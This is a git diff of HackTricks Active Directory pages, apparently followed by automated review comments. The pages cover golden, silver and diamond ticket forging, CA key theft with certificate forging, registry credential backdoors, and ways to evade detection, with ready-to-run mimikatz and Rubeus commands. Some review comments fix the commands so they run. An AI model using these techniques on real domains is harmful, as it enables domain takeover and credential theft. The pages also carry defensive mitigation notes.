diff --git a/SUMMARY.md b/SUMMARY.md index 560ac794..f543e4bf 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -163,7 +163,9 @@ * [Custom SSP](windows-hardening/active-directory-methodology/custom-ssp.md) * [DCShadow](windows-hardening/active-directory-methodology/dcshadow.md) * [DCSync](windows-hardening/active-directory-methodology/dcsync.md) + * [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md) * [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md) + * [Forged Certificates](windows-hardening/active-directory-methodology/forged-certificates.md) * [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md) * [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md) * [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md) diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md index b8a29739..76078308 100644 --- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md @@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -### Introduction +## Introduction Electron is **based on Chromium**, but it is not a browser. Certain principles and security mechanisms implemented by modern browsers are not in place.\ You could see Electron like a local backend+frontend app where **NodeJS** is the **backend** and **chromium** is the **frontend**. 
@@ -238,6 +238,11 @@ If `contextIsolation` set to false you can try to use \ (similar to \ -Set @{serviceprincipalname="fake/NOTHING"}r + ``` +* Make users vulnerable to [**ASREPRoast** ](asreproast.md) + + ```powershell + Set-DomainObject -Identity -XOR @{UserAccountControl=4194304} + ``` +* Grant [**DCSync**](./#dcsync) privileges to a user + + ```powershell + Add-DomainObjectAcl -TargetIdentity "DC=dev,DC=cyberbotic,DC=io" -PrincipalIdentity bfarmer -Rights DCSync + ``` + +### Silver Ticket + +The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** (like the **PC account hash**). Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user** (like privileged access to a computer). + +{% content-ref url="silver-ticket.md" %} +[silver-ticket.md](silver-ticket.md) +{% endcontent-ref %} ### Golden Ticket A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** (or machine) in the domain ad the impersonated user. -[**More information about Golden Ticket here.**](golden-ticket.md) +{% content-ref url="golden-ticket.md" %} +[golden-ticket.md](golden-ticket.md) +{% endcontent-ref %} -### Silver Ticket +### Diamond Ticket -The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** (like the **PC account hash**). 
Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user** (like privileged access to a computer).\ -[**More information about Silver Ticket here.**](silver-ticket.md) +These are like golden tickets forged in a way that **bypasses common golden tickets detection mechanisms.** + +{% content-ref url="diamond-ticket.md" %} +[diamond-ticket.md](diamond-ticket.md) +{% endcontent-ref %} + +### **Forged Certificates** + +{% content-ref url="forged-certificates.md" %} +[forged-certificates.md](forged-certificates.md) +{% endcontent-ref %} ### AdminSDHolder Group -The Access Control List (ACL) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.\ -By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group **AdminSDHolder** for example, giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour).\ +The Access Control List (ACL) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins, Backup Operators and krbtgt.\ +By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. 
However, if an attacker **modifies the ACL** of the group **AdminSDHolder** for example, giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour).\ And if someone tries to delete this user from the Domain Admins (for example) in an hour or less, the user will be back in the group.\ -[**More information about AdminSDHolder Group here**](privileged-accounts-and-token-privileges.md)**.** +****[**More information about AdminDSHolder Group here.**](privileged-accounts-and-token-privileges.md#adminsdholder-group)**** ### DSRM Credentials -There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\ -[**More information about DSRM Credentials here.**](dsrm-credentials.md) +There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user. + +{% content-ref url="dsrm-credentials.md" %} +[dsrm-credentials.md](dsrm-credentials.md) +{% endcontent-ref %} ### ACL Persistence -You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.\ -[**More information about interesting privileges here.**](acl-persistence-abuse.md) +You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**. 
+ +{% content-ref url="acl-persistence-abuse.md" %} +[acl-persistence-abuse.md](acl-persistence-abuse.md) +{% endcontent-ref %} ### Security Descriptors -The **security descriptors** are used to **store** the **permissions** an **object** have **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.\ -[**More information about Security Descriptors here**](security-descriptors.md)**.** +The **security descriptors** are used to **store** the **permissions** an **object** have **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group. + +{% content-ref url="security-descriptors.md" %} +[security-descriptors.md](security-descriptors.md) +{% endcontent-ref %} ### Skeleton Key -**Modify LSASS** in memory to create a **master password** that will work for any account in the domain.\ -[**More information about Skeleton Key here.**](skeleton-key.md) +**Modify LSASS** in memory to create a **master password** that will work for any account in the domain. + +{% content-ref url="skeleton-key.md" %} +[skeleton-key.md](skeleton-key.md) +{% endcontent-ref %} ### Custom SSP [Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\ You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.\ -[**More information about Custom SSP here**](custom-ssp.md)**.** + + +{% content-ref url="custom-ssp.md" %} +[custom-ssp.md](custom-ssp.md) +{% endcontent-ref %} ### DCShadow It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) 
on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\ -Note that if you use wrong data, pretty ugly logs will appear.\ -[**More information about DCShadow here.**](dcshadow.md) +Note that if you use wrong data, pretty ugly logs will appear. + +{% content-ref url="dcshadow.md" %} +[dcshadow.md](dcshadow.md) +{% endcontent-ref %} ## Forest Privilege Escalation - Domain Trusts diff --git a/windows-hardening/active-directory-methodology/diamond-ticket.md b/windows-hardening/active-directory-methodology/diamond-ticket.md new file mode 100644 index 00000000..df32dae8 --- /dev/null +++ b/windows-hardening/active-directory-methodology/diamond-ticket.md @@ -0,0 +1,67 @@ +# Diamond Ticket + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +## Diamond Ticket + +**Like a golden ticket**, a diamond ticket is a TGT which can be used to **access any service as any user**. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash. + +There are two common techniques to detect the use of golden tickets: + +* Look for TGS-REQs that have no corresponding AS-REQ. +* Look for TGTs that have silly values, such as Mimikatz's default 10-year lifetime. + +A **diamond ticket** is made by **modifying the fields of a legitimate TGT that was issued by a DC**. This is achieved by **requesting** a **TGT**, **decrypting** it with the domain's krbtgt hash, **modifying** the desired fields of the ticket, then **re-encrypting it**. This **overcomes the two aforementioned shortcomings** of a golden ticket because: + +* TGS-REQs will have a preceding AS-REQ. +* The TGT was issued by a DC which means it will have all the correct details from the domain's Kerberos policy. Even though these can be accurately forged in a golden ticket, it's more complex and open to mistakes. + +```bash +# Get user RID +powershell Get-DomainUser -Identity -Properties objectsid + +.\Rubeus.exe diamond /tgtdeleg /ticketuser: /ticketuserid: /groups:512 + +# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host. +# /ticketuser is the username of the principal to impersonate. +# /ticketuserid is the domain RID of that principal. +# /groups are the desired group RIDs (512 being Domain Admins). +# /krbkey is the krbtgt AES256 hash. +``` + +\ + + + + + + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/forged-certificates.md b/windows-hardening/active-directory-methodology/forged-certificates.md new file mode 100644 index 00000000..a1608705 --- /dev/null +++ b/windows-hardening/active-directory-methodology/forged-certificates.md @@ -0,0 +1,64 @@ +# Forged Certificates + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +## Forged Certificates + +Gaining **local admin access to a CA** allows an attacker to extract the **CA private key**, which can be used to sign a forged certificate (think of this like the krbtgt hash being able to sign a forged TGT). The default validity period for a CA private key is 5 years, but this can obviously be set to any value during setup, sometimes as high as 10+ years. + +Once on a CA, [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) can extract the private keys. + +
.\SharpDPAPI.exe certificates /machine
+
+# If Issuer and subject are the distinguished name of the CA, thats the one
+
+# Save the output to a .pem file and convert it to a .pfx with openssl on Kali
+ +Then, save the output to a `.pem` file and convert it to a **`.pfx` with openssl** on Kali. + +Build the forged certificate with [**ForgeCert**](https://github.com/GhostPack/ForgeCert)**:** + +```bash +.\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "password" --Subject "CN=User" --SubjectAltName "Administrator@cyberbotic.io" --NewCertPath fake.pfx --NewCertPassword "password" +``` + +Even though you can specify any SubjectAltName, the user does need to be present in AD. In this example, the default Administrator account is used.\ +Then we can simply **use Rubeus to request a legitimate TGT** with this forged certificate and use it to access the domain controller: + +```bash +.\Rubeus.exe asktgt /user:Administrator /domain:cyberbotic.io /certificate:MIACAQ[...snip...]IEAAAA /password:password /nowrap +``` + +{% hint style="warning" %} +Note that you aren't limited to forging user certificates, we can do the same for machines. Combine this with the S4U2self trick to gain access to any machine or service in the domain. +{% endhint %} + +
+ +Support HackTricks and get benefits! + +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! + +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) + +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) + +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** + +**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/golden-ticket.md b/windows-hardening/active-directory-methodology/golden-ticket.md index 4d4aec18..9f270cd9 100644 --- a/windows-hardening/active-directory-methodology/golden-ticket.md +++ b/windows-hardening/active-directory-methodology/golden-ticket.md @@ -1,4 +1,4 @@ - +# Golden Ticket
@@ -16,13 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Golden ticket -# Golden ticket - -A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** (or machine) in the domain and the impersonated user. +A valid **TGT as any user** can be created **using the NTLM hash of the krbtgt AD account**. The advantage of forging a TGT instead of TGS is being **able to access any service** (or machine) in the domain and the impersonated user.\ +Moreover the **credentials** of **krbtgt** are **never** **changed** automatically. The **krbtgt** account **NTLM hash** can be **obtained** from the **lsass process** or from the **NTDS.dit file** of any DC in the domain. It is also possible to get that NTLM through a **DCsync attack**, which can be performed either with the [lsadump::dcsync](https://github.com/gentilkiwi/mimikatz/wiki/module-\~-lsadump) module of Mimikatz or the impacket example [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py). Usually, **domain admin privileges or similar are required**, no matter what technique is used. +It also must be taken into account that it is possible AND **PREFERABLE** (opsec) to **forge tickets using the AES Kerberos keys (AES128 and AES256)**. + {% code title="From Linux" %} ```bash python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus 
@@ -33,24 +35,47 @@ python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass {% code title="From Windows" %} ```bash -mimikatz # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt +#mimikatz +kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt .\Rubeus.exe ptt /ticket:ticket.kirbi klist #List tickets in memory + +# Example using aes key +kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi ``` {% endcode %} **Once** you have the **golden Ticket injected**, you can access the shared files **(C$)**, and execute services and WMI, so you could use **psexec** or **wmiexec** to obtain a shell (looks like yo can not get a shell via winrm). -## Mitigation +### Bypassing common detections -Golden ticket events ID: +The most frequent ways to detect a golden ticket are by **inspecting Kerberos traffic** on the wire. By default, Mimikatz **signs the TGT for 10 years**, which will stand out as anomalous in subsequent TGS requests made with it. + +`Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM` + +Use the `/startoffset`, `/endin` and `/renewmax` parameters to control the start offset, duration and the maximum renewals (all in minutes). + +``` +Get-DomainPolicy | select -expand KerberosPolicy +``` + +Unfortunately, the TGT's lifetime is not logged in 4769's, so you won't find this information in the Windows event logs. However, what you can correlate is **seeing 4769's **_**without**_** a prior 4768**. 
It's **not possible to request a TGS without a TGT**, and if there is no record of a TGT being issued, we can infer that it was forged offline. + +In order to **bypass this detection** check the diamond tickets: + +{% content-ref url="diamond-ticket.md" %} +[diamond-ticket.md](diamond-ticket.md) +{% endcontent-ref %} + +### Mitigation * 4624: Account Logon * 4672: Admin Logon * `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property` -[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets) +Other little tricks defenders can do is **alert on 4769's for sensitive users** such as the default domain administrator account. +[**More information about Golden Ticket in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)
@@ -67,5 +92,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/security-descriptors.md b/windows-hardening/active-directory-methodology/security-descriptors.md index 12a07772..a555598b 100644 --- a/windows-hardening/active-directory-methodology/security-descriptors.md +++ b/windows-hardening/active-directory-methodology/security-descriptors.md @@ -1,4 +1,4 @@ - +# Security Descriptors
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# Security Descriptors +## Security Descriptors Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL:: `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;` @@ -25,6 +24,8 @@ The **security descriptors** are used to **store** the **permissions** an **obje Then, this persistence technique is based on the hability to win every privilege needed against certain objects, to be able to perform a task that usually requires admin privileges but without the need of being admin. +### Access to WMI + You can give a user access to **execute remotely WMI** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1): ```bash @@ -32,6 +33,8 @@ Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove ``` +### Access to WinRM + Give access to **winrm PS console to a user** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:** ```bash 
@@ -39,15 +42,25 @@ Set-RemotePSRemoting -UserName student1 -ComputerName -Verbose Set-RemotePSRemoting -UserName student1 -ComputerName -Remove #Remove ``` +### Remote access to hashes + Access the **registry** and **dump hashes** creating a **Reg backdoor using** [**DAMP**](https://github.com/HarmJ0y/DAMP)**,** so you can at any moment retrieve the **hash of the computer**, the **SAM** and any **cached AD** credential in the computer. So, it's very useful to give this permission to a **regular user against a Domain Controller computer**: ```bash +# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials. Add-RemoteRegBackdoor -ComputerName -Trustee student1 -Verbose + +# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine. Get-RemoteMachineAccountHash -ComputerName -Verbose + +# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine. Get-RemoteLocalAccountHash -ComputerName -Verbose + +# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine. Get-RemoteCachedCredential -ComputerName -Verbose ``` +Check [**Silver Tickets**](silver-ticket.md) to learn how you could use the hash of the computer account of a Domain Controller.
@@ -64,5 +77,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/silver-ticket.md b/windows-hardening/active-directory-methodology/silver-ticket.md index 18f9390a..9e3e9f12 100644 --- a/windows-hardening/active-directory-methodology/silver-ticket.md +++ b/windows-hardening/active-directory-methodology/silver-ticket.md 
@@ -28,9 +28,9 @@ If you are interested in **hacking carer** and hack the unhackable - **we are hi The Silver ticket attack is based on **crafting a valid TGS for a service once the NTLM hash of service is owned** (like the **PC account hash**). Thus, it is possible to **gain access to that service** by forging a custom TGS **as any user**. -In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service. The computer accounts reset their passwords every 30 days by default. +In this case, the NTLM **hash of a computer account** (which is kind of a user account in AD) is **owned**. Hence, it is possible to **craft** a **ticket** in order to **get into that machine** with **administrator** privileges through the SMB service. The computer accounts reset their passwords every 30 days by default. -It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys (AES128 and AES256). To know how to generate an AES key read: [section 4.4 of MS-KILE](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-kile/936a4878-9462-4753-aac8-087cd3ca4625) or the [Get-KerberosAESKey.ps1](https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372). +It also must be taken into account that it is possible AND **PREFERABLE** (opsec) to **forge tickets using the AES Kerberos keys (AES128 and AES256)**. To know how to generate an AES key read: [section 4.4 of MS-KILE](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-kile/936a4878-9462-4753-aac8-087cd3ca4625) or the [Get-KerberosAESKey.ps1](https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372). {% code title="Linux" %} ```bash 
@@ -51,6 +51,9 @@ mimikatz.exe "kerberos::ptt ticket.kirbi" .\Rubeus.exe ptt /ticket:ticket.kirbi #Obtain a shell .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd + +#Example using aes key +kerberos::golden /user:Administrator /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /target:labwws02.jurassic.park /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi ``` {% endcode %} diff --git a/windows-hardening/active-directory-methodology/skeleton-key.md b/windows-hardening/active-directory-methodology/skeleton-key.md index d9ce88af..68d1a18c 100644 --- a/windows-hardening/active-directory-methodology/skeleton-key.md +++ b/windows-hardening/active-directory-methodology/skeleton-key.md @@ -1,4 +1,4 @@ - +# Skeleton Key
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# **Skeleton Key** +## **Skeleton Key** **From:** [**https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/**](https://blog.stealthbits.com/unlocking-all-the-doors-to-active-directory-with-the-skeleton-key-attack/) @@ -47,9 +46,7 @@ If lsass was **already patched** with skeleton, then this **error** will appear: ![](<../../.gitbook/assets/image (160).png>) -## Mitigations - -Skeleton Key +### Mitigations * Events: * System Event ID 7045 - A service was installed in the system. (Type Kernel Mode driver) @@ -62,7 +59,6 @@ Skeleton Key * `New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose` * Verify after reboot: `Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "`_`protected process"}`_ -
Support HackTricks and get benefits! @@ -78,5 +74,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- -
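Review bot: in the ASREPRoast bullet of the active-directory-methodology README hunk, `Set-DomainObject -XOR @{UserAccountControl=4194304}` toggles the DONT_REQ_PREAUTH bit (0x400000) rather than setting it, so running the same line against an account that already has pre-authentication disabled silently re-enables it; say so in the bullet and pair it with a check such as `Get-DomainUser -Identity <user> -PreauthNotRequired` before and after. The bullet should also mention that this is a write to the account's `userAccountControl` attribute and therefore surfaces in user-account-change auditing, the same opsec caveat the DCSync bullet deserves for the ACE it adds on the domain head object.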
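Review bot: the replacement link text in the AdminSDHolder hunk reads `AdminDSHolder` while the heading, the anchor `#adminsdholder-group` and the rest of the paragraph spell it `AdminSDHolder`; fix the typo and drop the stray `****` markers wrapped around the link. In the same paragraph `krbtgt` is an account, not a group, so the new list `Schema Admins, Backup Operators and krbtgt` should read along the lines of `Schema Admins and Backup Operators, plus the krbtgt account and the members of those groups`.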
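Review bot: the Rubeus command in the new diamond-ticket.md omits `/krbkey`, although the comment block directly below it documents `/krbkey` as the krbtgt AES256 hash; without that key Rubeus cannot decrypt the delegated TGT, edit the PAC and re-encrypt it, so the example as written does not run. Add `/krbkey:<krbtgt AES256 key>` to the command line and state up front that possessing the krbtgt key is the prerequisite (typically obtained via DCSync, which already requires replication rights), otherwise the reader may assume `/tgtdeleg` alone is enough. Also reword `domain controllers don't track TGTs it (or they) have legitimately issued` to `domain controllers do not keep a record of the TGTs they have issued`, and remove the stray `\` line left between the code block and the footer.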
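Review bot: the new forged-certificates.md mentions the `.pem` to `.pfx` conversion twice (as a comment inside the SharpDPAPI block and again in prose) but never shows the command; keep one mention and include the invocation the SharpDPAPI README documents, `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx`, since the export password chosen there is what `--CaCertPassword` later expects. The page should also carry the caveat that a certificate signed with the stolen CA key was never issued by the CA, so it is absent from the CA database and cannot be revoked through the CRL; the only remediation is rotating the CA key, which is what makes this a persistence technique rather than a one-off credential theft.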
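Review bot: removing the `Golden ticket events ID:` line in the golden-ticket.md detections hunk leaves the `* 4624: Account Logon` / `* 4672: Admin Logon` bullets hanging directly under `### Mitigation` with nothing saying what they are; restore a lead-in such as `Event IDs worth alerting on when a golden ticket is used:`. The `Get-DomainPolicy | select -expand KerberosPolicy` block is likewise dropped in without explanation: say that it returns the domain's `MaxTicketAge` and `MaxRenewAge` so `/endin` and `/renewmax` can be set to match them, and tag the fence `bash` like the other blocks on the page. One caveat worth adding to the 4769-without-4768 correlation: the AS-REQ and TGS-REQ of a legitimate session are frequently served by different DCs, so the check only works over security logs collected from every DC in the domain. Finally, `Other little tricks defenders can do is` should read `Another trick defenders can use is`.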
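Review bot: in the golden-ticket.md "From Windows" hunk the added AES example writes the ticket to `golden.kirbi`, but the `.\Rubeus.exe ptt /ticket:ticket.kirbi` line two lines above injects `ticket.kirbi`, so a reader following the block top to bottom injects a file the example never produced; either name the output `ticket.kirbi` or add a matching `ptt` line after the AES command. While here, the comment `#mimikatz` should say it marks a command typed at the mimikatz prompt, since the surrounding lines are run from cmd/PowerShell.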
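Review bot: the new `### Access to WinRM` heading in security-descriptors.md sits above a sentence whose `using this` link still points at `Backdoors/Set-RemoteWMI.ps1`, although the commands that follow are `Set-RemotePSRemoting`; since the hunk is already touching this spot, point the link at Nishang's `Backdoors/Set-RemotePSRemoting.ps1` so the heading and the reference agree.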
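Review bot: the AES example added to silver-ticket.md targets `labwws02.jurassic.park` but writes the ticket to `srv2-cifs.kirbi`, while the `ptt` lines above inject `ticket.kirbi`, and the example is placed after the `#Obtain a shell` step instead of beside the other `kerberos::golden` invocation; rename the output to match (or add its own `ptt` line) and move it next to the NTLM-based forge so the block reads as one sequence. The sentence stating that AES keys are PREFERABLE for opsec would be stronger with the reason: in a domain where AES is the default, an RC4-encrypted service ticket shows up as encryption type 0x17 in event 4769 and is an easy signal for defenders.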